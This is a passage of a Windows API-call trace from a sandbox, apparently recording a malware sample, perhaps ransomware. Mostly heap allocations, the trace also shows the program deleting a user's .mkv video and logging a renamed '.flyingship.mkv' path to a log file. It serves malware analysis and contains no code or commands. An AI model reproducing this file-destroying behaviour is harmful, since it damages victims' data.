1 [0192.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0192.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0192.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0192.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0192.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0192.597] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0192.597] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.597] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.598] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.622] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0192.622] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.622] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.622] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv", lpFilePart=0x0) returned 0x3e [0192.622] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687dfa70, ftCreationTime.dwHighDateTime=0x1d5e7ae, ftLastAccessTime.dwLowDateTime=0xdc4fcb20, ftLastAccessTime.dwHighDateTime=0x1d5e3aa, ftLastWriteTime.dwLowDateTime=0x18038260, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1227e, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="7999fJY.mkv", cAlternateFileName="")) returned 0x90ae18 [0192.623] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\7999fjy.mkv")) returned 1 [0192.625] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687dfa70, ftCreationTime.dwHighDateTime=0x1d5e7ae, ftLastAccessTime.dwLowDateTime=0xdc4fcb20, ftLastAccessTime.dwHighDateTime=0x1d5e3aa, ftLastWriteTime.dwLowDateTime=0x18038260, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1227e, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="7999fJY.mkv", cAlternateFileName="")) returned 0 [0192.625] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0192.627] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.628] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0192.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0192.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0192.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0192.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.628] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.628] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0192.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0192.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0192.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.629] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0192.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.629] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0192.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0192.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.629] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0192.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0192.629] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0192.629] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.631] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.631] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0192.631] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.631] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0192.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.632] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0192.632] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3464, lpOverlapped=0x0) returned 1 [0192.633] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0192.633] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3464, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.633] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0192.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.flyingship.mkv\r\n", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0192.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4c) returned 0x923b28 [0192.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.flyingship.mkv\r\n", cchWideChar=76, lpMultiByteStr=0x923b28, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.flyingship.mkv\r\n", lpUsedDefaultChar=0x0) returned 76 [0192.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0192.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0192.633] WriteFile (in: hFile=0x160, lpBuffer=0x9238c0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9238c0*, lpNumberOfBytesWritten=0x87f43c*=0x4b, lpOverlapped=0x0) returned 1 [0192.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0192.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.634] CloseHandle (hObject=0x160) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907340 | out: hHeap=0x8a0000) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0192.635] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0192.635] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0192.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0192.637] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0192.637] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.637] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0192.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0192.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0192.637] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0192.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0192.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0192.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0192.638] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0192.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0192.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0192.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0192.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0192.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 